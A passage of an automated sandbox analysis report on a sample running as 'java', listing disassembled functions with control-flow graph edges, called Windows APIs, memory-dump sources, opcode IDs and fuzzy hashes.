                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb1b77a356158e132d64033ebf7efeba50b97707156cc099648be1c84ee0bf75
                                                            • Instruction ID: 9388124bcedc4a59c5ed3e076cfacabca10129d6aaabba002d47842156306fa6
                                                            • Opcode Fuzzy Hash: cb1b77a356158e132d64033ebf7efeba50b97707156cc099648be1c84ee0bf75
                                                            • Instruction Fuzzy Hash: 7F91B274E102098FCB08DFEAC984ADEFBB2EF89300F24A52AD515BB264D7359945CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9C720 Relevance: .2, Instructions: 201COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fd8d543894bb1e0f902258f679d7b742e4c5f671952d75f64a009d766eaf20a7
                                                            • Instruction ID: ec473d094af02638e796082c2c59393fcd2b2d9eca3f01f90eb518a40f617b17
                                                            • Opcode Fuzzy Hash: fd8d543894bb1e0f902258f679d7b742e4c5f671952d75f64a009d766eaf20a7
                                                            • Instruction Fuzzy Hash: A481C074E102098FCB08DFEAC984AEEFBB2AF89300F20A52AD515BB354D7359905CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9CEA8 Relevance: .2, Instructions: 150COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8b36a323402a90d8f9952de4d67015a4c8fd3614906b85fd64c0450a9e899e23
                                                            • Instruction ID: bce706e9728fa3325ff201e0b0c99fa8c229d69ac7c04cae9eab5a9c13c51366
                                                            • Opcode Fuzzy Hash: 8b36a323402a90d8f9952de4d67015a4c8fd3614906b85fd64c0450a9e899e23
                                                            • Instruction Fuzzy Hash: AA5108B0E046198FDB08DFA6D9446EEFBF2BF8D301F24E56AD409A7254D7348941CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9D800 Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ccc494c0f54b4bf044cfa96b1d36fa4723be22434f540e1ffbd102369bc17833
                                                            • Instruction ID: dfc3466e10f20ce860dc92703e48dfd2922bea891febe83bfebbc9ed95fa763e
                                                            • Opcode Fuzzy Hash: ccc494c0f54b4bf044cfa96b1d36fa4723be22434f540e1ffbd102369bc17833
                                                            • Instruction Fuzzy Hash: C621EA71E006588BEB18CFAB98406DEFBB3AFC9310F18C16AD509A6255DB304A56CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 057BE0B0 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentProcess.KERNEL32 ref: 057BE110
                                                            • GetCurrentThread.KERNEL32 ref: 057BE14D
                                                            • GetCurrentProcess.KERNEL32 ref: 057BE18A
                                                            • GetCurrentThreadId.KERNEL32 ref: 057BE1E3
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.425355320.00000000057B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_57b0000_java.jbxd
                                                            Similarity
                                                            • API ID: Current$ProcessThread
                                                            • String ID:
                                                            • API String ID: 2063062207-0
                                                            • Opcode ID: 45a3eac83196def776c981fc484ec32150251c6b6bc1f77b1c7c24716cb6ba63
                                                            • Instruction ID: 7aeb8446d46f80682a1c5d929a8fe9c1646e2aeb06e4748bc3d1bb90f965937e
                                                            • Opcode Fuzzy Hash: 45a3eac83196def776c981fc484ec32150251c6b6bc1f77b1c7c24716cb6ba63
                                                            • Instruction Fuzzy Hash: AB5133B09002498FDB14CFAADA49BDEFBF4BF88314F248869E419A7350D774A944CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E95F18 Relevance: 2.8, Strings: 2, Instructions: 290COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 345 2e95f18-2e95f3f 346 2e95f5b-2e95f6b call 2e95d78 345->346 347 2e95f41-2e95f59 345->347 352 2e95f70-2e95f75 346->352 347->352 483 2e95f77 call 2e95f18 352->483 484 2e95f77 call 2e96220 352->484 353 2e95f7d-2e95f83 354 2e96209-2e9622e 353->354 355 2e95f89-2e95f97 353->355 358 2e9623d-2e9624f 354->358 359 2e96230-2e96236 354->359 360 2e95f99-2e95fa0 355->360 361 2e95fef-2e95ff8 355->361 375 2e962e3-2e962e7 call 2e9646f 358->375 376 2e96255-2e96259 358->376 359->358 364 2e960f9-2e96125 360->364 365 2e95fa6-2e95fab 360->365 362 2e9612c-2e96158 361->362 363 2e95ffe-2e96002 361->363 414 2e9615f-2e961c9 362->414 367 2e96013-2e96028 363->367 368 2e96004-2e9600d 363->368 364->362 369 2e95fad-2e95fb3 365->369 370 2e95fc3-2e95fd1 365->370 485 2e9602b call 2e96a38 367->485 486 2e9602b call 2e969a0 367->486 368->362 368->367 372 2e95fb5 369->372 373 2e95fb7-2e95fc1 369->373 386 2e95fda-2e95fea 370->386 387 2e95fd3-2e95fd5 370->387 372->370 373->370 385 2e962ed-2e962f3 375->385 379 2e96269-2e96276 376->379 380 2e9625b-2e96267 376->380 377 2e96031-2e96038 381 2e9603a-2e9604e 377->381 382 2e96053-2e96057 377->382 396 2e96278-2e96282 379->396 380->396 393 2e960ef-2e960f6 381->393 389 2e9605d-2e96061 382->389 390 2e961d0-2e96202 382->390 391 2e962ff-2e96306 385->391 392 2e962f5-2e962fb 385->392 386->393 387->393 389->390 399 2e96067-2e96072 389->399 390->354 400 2e962fd 392->400 401 2e96361-2e963c0 392->401 411 2e962af-2e962b3 396->411 412 2e96284-2e96293 396->412 399->390 413 2e96078-2e96095 399->413 400->391 429 2e963c7-2e963cf 401->429 415 2e962bf-2e962c3 411->415 416 2e962b5-2e962bb 411->416 424 2e962a3-2e962ad 412->424 425 2e96295-2e9629c 412->425 492 2e96098 call 2e96a38 413->492 493 2e96098 call 2e969a0 413->493 414->390 415->391 421 2e962c5-2e962c9 415->421 422 2e96309-2e9635a 416->422 423 2e962bd 416->423 420 2e9609e-2e960a5 420->390 427 2e960ab-2e960ba 420->427 428 2e962cf-2e962e1 421->428 421->429 422->401 423->391 424->411 425->424 488 2e960bd call 2e9840d 427->488 489 2e960bd call 2e98360 427->489 490 2e960bd call 2e98350 427->490 428->391 439 2e963d1-2e963dd 429->439 436 2e960c3-2e960c7 436->414 440 2e960cd-2e960db call 2e99af0 436->440 439->439 444 2e963df-2e963eb 439->444 445 2e960e1-2e960e7 440->445 447 2e963ed-2e963ef 444->447 448 2e963f1-2e963f3 444->448 445->390 453 2e960ed 445->453 450 2e96469-2e9646c 447->450 451 2e963f5-2e963f9 448->451 452 2e96404-2e96406 448->452 456 2e963fb-2e963fd 451->456 457 2e963ff-2e96402 451->457 458 2e96419-2e9641f 452->458 459 2e96408-2e9640c 452->459 453->393 456->450 457->450 464 2e9644a-2e9644c 458->464 465 2e96421-2e96448 458->465 461 2e9640e-2e96410 459->461 462 2e96412-2e96417 459->462 461->450 462->450 468 2e96453-2e96455 464->468 465->468 472 2e9645b-2e9645d 468->472 473 2e96457-2e96459 468->473 475 2e9645f-2e96464 472->475 476 2e96466 472->476 473->450 475->450 476->450 483->353 484->353 485->377 486->377 488->436 489->436 490->436 492->420 493->420
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Xc(i$Xc(i
                                                            • API String ID: 0-3138704727
                                                            • Opcode ID: 7bd5f7f1604d195b28567b45227e60ad0609f387e44b75b02b3151c86f42ae2a
                                                            • Instruction ID: b2503a14b1d3b9f9f50106f1eb8a27390ff7b7f8b48bad760f7c7a293e9c1b2d
                                                            • Opcode Fuzzy Hash: 7bd5f7f1604d195b28567b45227e60ad0609f387e44b75b02b3151c86f42ae2a
                                                            • Instruction Fuzzy Hash: 15A1B430B401189FCF25DF64D858BBE7BAAEF89359F15882AF506DB290CB749C05CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E96618 Relevance: 2.7, Strings: 2, Instructions: 234COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 494 2e96618-2e96625 495 2e9662d-2e9662f 494->495 496 2e96627-2e9662b 494->496 498 2e96840-2e96847 495->498 496->495 497 2e96634-2e9663f 496->497 499 2e96848 497->499 500 2e96645-2e9664c 497->500 505 2e9684d-2e96885 499->505 501 2e967e1-2e967e7 500->501 502 2e96652-2e96661 500->502 503 2e967e9-2e967eb 501->503 504 2e967ed-2e967f1 501->504 502->505 506 2e96667-2e96676 502->506 503->498 507 2e9683e 504->507 508 2e967f3-2e967f9 504->508 524 2e9688e-2e96892 505->524 525 2e96887-2e9688c 505->525 512 2e96678-2e9667b 506->512 513 2e9668b-2e9668e 506->513 507->498 508->499 510 2e967fb-2e967fe 508->510 510->499 514 2e96800-2e96815 510->514 515 2e9669a-2e966a0 512->515 516 2e9667d-2e96680 512->516 513->515 517 2e96690-2e96693 513->517 531 2e96839-2e9683c 514->531 532 2e96817-2e9681d 514->532 526 2e966b8-2e966d5 515->526 527 2e966a2-2e966a8 515->527 519 2e96781-2e96787 516->519 520 2e96686 516->520 521 2e96695 517->521 522 2e966e6-2e966ec 517->522 536 2e96789-2e9678f 519->536 537 2e9679f-2e967a9 519->537 528 2e967ac-2e967b9 520->528 521->528 529 2e966ee-2e966f4 522->529 530 2e96704-2e96716 522->530 533 2e96898-2e9689a 524->533 525->533 565 2e966de-2e966e1 526->565 534 2e966aa 527->534 535 2e966ac-2e966b6 527->535 555 2e967bb-2e967bf 528->555 556 2e967cd-2e967cf 528->556 541 2e966f8-2e96702 529->541 542 2e966f6 529->542 558 2e96718-2e96724 530->558 559 2e96726-2e96749 530->559 531->498 543 2e9682f-2e96832 532->543 544 2e9681f-2e9682d 532->544 545 2e9689c-2e968ae 533->545 546 2e968af-2e968b6 533->546 534->526 535->526 538 2e96791 536->538 539 2e96793-2e9679d 536->539 537->528 538->537 539->537 541->530 542->530 543->499 547 2e96834-2e96837 543->547 544->499 544->543 547->531 547->532 555->556 561 2e967c1-2e967c5 555->561 562 2e967d3-2e967d6 556->562 568 2e96771-2e9677f 558->568 559->499 570 2e9674f-2e96752 559->570 561->499 566 2e967cb 561->566 562->499 567 2e967d8-2e967db 562->567 565->528 566->562 567->501 567->502 568->528 570->499 572 2e96758-2e9676a 570->572 572->568
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Xc(i$Xc(i
                                                            • API String ID: 0-3138704727
                                                            • Opcode ID: bb840eaaf5b30a0492252fb4a0f18df433362ddda6dd3639823a5eaeb6c28073
                                                            • Instruction ID: 6f55d1f75d12ae7168ed4bf87d754e883f1d78ab830ecc58e95017e71be78d6c
                                                            • Opcode Fuzzy Hash: bb840eaaf5b30a0492252fb4a0f18df433362ddda6dd3639823a5eaeb6c28073
                                                            • Instruction Fuzzy Hash: 10818C74A401058FCF24CF69C884AAABBBAEF89258B15E06BD405DB365C731E841CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0BD8258E Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 635 bd8258e-bd825fe 636 bd82609-bd82610 635->636 637 bd82600-bd82606 635->637 638 bd8261b-bd82653 636->638 639 bd82612-bd82618 636->639 637->636 640 bd8265b-bd826ba CreateWindowExW 638->640 639->638 641 bd826bc-bd826c2 640->641 642 bd826c3-bd826fb 640->642 641->642 646 bd82708 642->646 647 bd826fd-bd82700 642->647 648 bd82709 646->648 647->646 648->648
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0BD826AA
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.427014290.000000000BD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BD80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_bd80000_java.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 0d756088c3addb0d668aa797880281c0c8a845e40457436a0dc147c6ef542937
                                                            • Instruction ID: b059f501f78ae6387aa7c765f32200cf6a1a2f4e3e0fe38f434d643a537cad03
                                                            • Opcode Fuzzy Hash: 0d756088c3addb0d668aa797880281c0c8a845e40457436a0dc147c6ef542937
                                                            • Instruction Fuzzy Hash: 7551C0B1D003089FDB14CFA9C985ADEFBB5BF88314F24862AE419AB250D7719845CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0BD82598 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 649 bd82598-bd825fe 650 bd82609-bd82610 649->650 651 bd82600-bd82606 649->651 652 bd8261b-bd826ba CreateWindowExW 650->652 653 bd82612-bd82618 650->653 651->650 655 bd826bc-bd826c2 652->655 656 bd826c3-bd826fb 652->656 653->652 655->656 660 bd82708 656->660 661 bd826fd-bd82700 656->661 662 bd82709 660->662 661->660 662->662
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0BD826AA
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.427014290.000000000BD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BD80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_bd80000_java.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 212bebc9a1a2341b7300444fb4ebee38312c84ad69a94735e5e66cad2e7f0d6c
                                                            • Instruction ID: 2957ce2718d6477627d17669f3869f96626e24391f6ebedf3c9322f0530ea6c0
                                                            • Opcode Fuzzy Hash: 212bebc9a1a2341b7300444fb4ebee38312c84ad69a94735e5e66cad2e7f0d6c
                                                            • Instruction Fuzzy Hash: 9941BEB1D00309DFDB14DF9AC985ADEFBB5BF88314F24852AE819AB250D7749845CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0BD8159C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 663 bd8159c-bd84b7c 666 bd84c2c-bd84c4c call bd81474 663->666 667 bd84b82-bd84b87 663->667 675 bd84c4f-bd84c5c 666->675 668 bd84b89-bd84bc0 667->668 669 bd84bda-bd84c12 CallWindowProcW 667->669 677 bd84bc9-bd84bd8 668->677 678 bd84bc2-bd84bc8 668->678 671 bd84c1b-bd84c2a 669->671 672 bd84c14-bd84c1a 669->672 671->675 672->671 677->675 678->677
                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0BD84C01
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.427014290.000000000BD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BD80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_bd80000_java.jbxd
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: 53c2ffc5f9524e2bcb9d47e7eb2747a788eab6698d3128b2d148f6bed0a43a0e
                                                            • Instruction ID: 819fc3e8250eb1c5ac3f6ddda1e7c19c0c67ee05fc180b827dabe72df9281e7f
                                                            • Opcode Fuzzy Hash: 53c2ffc5f9524e2bcb9d47e7eb2747a788eab6698d3128b2d148f6bed0a43a0e
                                                            • Instruction Fuzzy Hash: 8E413BB5A002458FCB14DF99C488BAAFBF9FF89324F148899D519A7321D774E845CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 057BE2D8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 680 57be2d8-57be36c DuplicateHandle 681 57be36e-57be374 680->681 682 57be375-57be392 680->682 681->682
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 057BE35F
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.425355320.00000000057B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_57b0000_java.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 265c40ecea9c4347b747a110c8cb9a1a703d60a6c5ba47705553fc610cd8db86
                                                            • Instruction ID: a20337a8b68a4248feaf81a1d549c84aae1b36c8657d9821f01d4d93da72c28b
                                                            • Opcode Fuzzy Hash: 265c40ecea9c4347b747a110c8cb9a1a703d60a6c5ba47705553fc610cd8db86
                                                            • Instruction Fuzzy Hash: FD21C6B59002489FDB10CFA9D584ADEFBF8FB48314F14841AE954A3310D374A954CF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0BD827D8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 685 bd827d8-bd827de 686 bd827e0-bd8284a SetWindowLongW 685->686 687 bd8284c-bd82852 686->687 688 bd82853-bd82867 686->688 687->688
                                                            APIs
                                                            • SetWindowLongW.USER32(?,?,?), ref: 0BD8283D
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.427014290.000000000BD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BD80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_bd80000_java.jbxd
                                                            Similarity
                                                            • API ID: LongWindow
                                                            • String ID:
                                                            • API String ID: 1378638983-0
                                                            • Opcode ID: 5bd9c4a9555da54780cc402761f9302e18d938c24eb9dbbfc7fb5f36e47f18a5
                                                            • Instruction ID: ad80ebc6e1e61d4687d5a0a103364933a86489ce75242e91dc056c14eac3c37a
                                                            • Opcode Fuzzy Hash: 5bd9c4a9555da54780cc402761f9302e18d938c24eb9dbbfc7fb5f36e47f18a5
                                                            • Instruction Fuzzy Hash: 4611F2B58002089FDB20DF99D589BDEFBF8EB48324F14851AE958A3700C375AA45CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0BD827E0 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 690 bd827e0-bd8284a SetWindowLongW 691 bd8284c-bd82852 690->691 692 bd82853-bd82867 690->692 691->692
                                                            APIs
                                                            • SetWindowLongW.USER32(?,?,?), ref: 0BD8283D
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.427014290.000000000BD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0BD80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_bd80000_java.jbxd
                                                            Similarity
                                                            • API ID: LongWindow
                                                            • String ID:
                                                            • API String ID: 1378638983-0
                                                            • Opcode ID: fb25ac42aef69549ff670f18677c32c92f4c092f0cef91a8074fb947222ba931
                                                            • Instruction ID: 7e5aebc95edebb919d75b91539a5cf2eaa0ba68ec1acdc406b2a2f97e3d0edd3
                                                            • Opcode Fuzzy Hash: fb25ac42aef69549ff670f18677c32c92f4c092f0cef91a8074fb947222ba931
                                                            • Instruction Fuzzy Hash: 4B1100B58002088FDB20DF9AD589BDEFBF8EB48324F14841AD958A3700C374A945CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E99C40 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 694 2e99c40-2e99c56 695 2e99c58-2e99c5e 694->695 696 2e99c74-2e99c76 694->696 697 2e99c60-2e99c64 695->697 698 2e99c77-2e99ca0 695->698 697->696 699 2e99c66-2e99c6e 697->699 702 2e99cb8-2e99cc9 698->702 703 2e99ca2-2e99ca8 698->703 699->698 701 2e99c70-2e99c72 699->701 701->696 701->699 708 2e99ccf-2e99cd8 702->708 709 2e99ec0-2e99ed3 702->709 704 2e99caa 703->704 705 2e99cac-2e99cb6 703->705 704->702 705->702 710 2e99eda-2e99f0f 708->710 711 2e99cde-2e99cef 708->711 709->710 718 2e9a072-2e9a118 710->718 719 2e99f15-2e99f17 710->719 717 2e99cf7-2e99cff 711->717 720 2e99d0d-2e99d13 717->720 721 2e99d01-2e99d03 717->721 722 2e99f19-2e99f23 719->722 723 2e99f54-2e99f66 719->723 724 2e99d15-2e99d1f 720->724 725 2e99d24-2e99d2a 720->725 721->720 732 2e99f4d-2e99f4f 722->732 733 2e99f25-2e99f48 722->733 740 2e99f68-2e99f71 723->740 741 2e99f73-2e99f75 723->741 734 2e99eb3-2e99eba 724->734 725->710 727 2e99d30-2e99d56 725->727 748 2e99d58-2e99d5b 727->748 749 2e99d65-2e99d71 727->749 735 2e9a06a-2e9a06f 732->735 733->735 740->741 742 2e99f83-2e99f85 741->742 743 2e99f77-2e99f81 741->743 742->735 743->742 756 2e99f8a-2e99f9c 743->756 748->749 750 2e99d83-2e99d89 749->750 751 2e99d73-2e99d7e 749->751 750->710 753 2e99d8f-2e99db5 750->753 751->734 765 2e99dc4-2e99dd0 753->765 766 2e99db7-2e99dba 753->766 767 2e99f9e-2e99fb0 756->767 768 2e99fc1-2e99fcf 756->768 770 2e99dd2-2e99de0 765->770 771 2e99de5-2e99dea 765->771 766->765 767->768 782 2e99fb2-2e99fbc 767->782 777 2e99fd8-2e99fe2 768->777 778 2e99fd1-2e99fd3 768->778 770->734 772 2e99ebb 771->772 773 2e99df0-2e99df3 771->773 772->709 773->772 776 2e99df9-2e99e0f 773->776 776->710 786 2e99e15-2e99e1e 776->786 787 2e9a012-2e9a01c 777->787 788 2e99fe4-2e99fee 777->788 778->735 782->735 786->710 791 2e99e24-2e99e30 786->791 796 2e9a01e-2e9a028 787->796 797 2e9a041-2e9a047 787->797 788->787 798 2e99ff0-2e99ff6 788->798 791->710 792 2e99e36-2e99e3f 791->792 792->772 795 2e99e41-2e99e4d 792->795 801 2e99ea8-2e99eab 795->801 802 2e99e4f 795->802 796->797 812 2e9a02a-2e9a03f 796->812 799 2e9a049-2e9a052 call 2e95ee8 797->799 800 2e9a060-2e9a062 797->800 803 2e99ff8 798->803 804 2e99ffa-2e9a006 798->804 799->800 813 2e9a054-2e9a05e 799->813 800->735 801->734 806 2e99e52-2e99e57 802->806 808 2e9a008-2e9a010 803->808 804->808 806->710 811 2e99e5d-2e99e7f 806->811 808->735 820 2e99e8d-2e99e98 811->820 821 2e99e81-2e99e83 811->821 812->735 813->735 820->710 822 2e99e9a-2e99ea1 820->822 821->820 822->772 823 2e99ea3-2e99ea6 822->823 823->801 823->806
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: /(i
                                                            • API String ID: 0-1904048125
                                                            • Opcode ID: 98b2837a417df386ea693c07d608fe2bc1b462114b23e58e50d3eef93419030e
                                                            • Instruction ID: c8cb20a22c0ffcffd4a6b0dda9bc57694ecd5824d3b09dd121105980d359dbad
                                                            • Opcode Fuzzy Hash: 98b2837a417df386ea693c07d608fe2bc1b462114b23e58e50d3eef93419030e
                                                            • Instruction Fuzzy Hash: 6991D175A401188FCF14CBA8C5945EEBBFAEFCA218B14D56FD815AB356CB309C02CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E943B0 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: d
                                                            • API String ID: 0-2564639436
                                                            • Opcode ID: 400ac4d996dfdd6295c05290acec6dbb1e2547964e2d61fbc56b67002b231851
                                                            • Instruction ID: cfbc306b5861cec2107f5505e8d64b2f68918c571ea6e859cd12dda46792ad51
                                                            • Opcode Fuzzy Hash: 400ac4d996dfdd6295c05290acec6dbb1e2547964e2d61fbc56b67002b231851
                                                            • Instruction Fuzzy Hash: 64314534E012089FCF18DFA9E880AEDBBB2AF89314F50912AE405B7344DB349946CF14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9ED90 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: &u1
                                                            • API String ID: 0-296620219
                                                            • Opcode ID: 61909cea7f6e2eda5b05f95fa23ce1485f40a005873050473edbf6ce36a1c46e
                                                            • Instruction ID: b3bc0a0375f7ac85e18f5303cfa3a022ea8bdcdfa96436f9218d64dff0f887df
                                                            • Opcode Fuzzy Hash: 61909cea7f6e2eda5b05f95fa23ce1485f40a005873050473edbf6ce36a1c46e
                                                            • Instruction Fuzzy Hash: 2B210670D44209DFCB44CFAAC5419AEFBF5EB8A200F18D9ABD505AB214E7309A41CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9A3BA Relevance: .3, Instructions: 251COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1b6913578060a7c431e439ebd529414d4b133595998c208b37c01e7bc53d753
                                                            • Instruction ID: 8f9c561342495960a450de8ff297906c888a07346c759c27c6d5da080bc9469f
                                                            • Opcode Fuzzy Hash: e1b6913578060a7c431e439ebd529414d4b133595998c208b37c01e7bc53d753
                                                            • Instruction Fuzzy Hash: 4991CA716402199FCF15DF64D858AAE7BB2FF8A318F01946AE805DB3A1CB30DC55CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E96220 Relevance: .2, Instructions: 209COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e3d5cbe15746f150fa6b9fb0ceaa284a8edb738846d4280fe016514ba570dab1
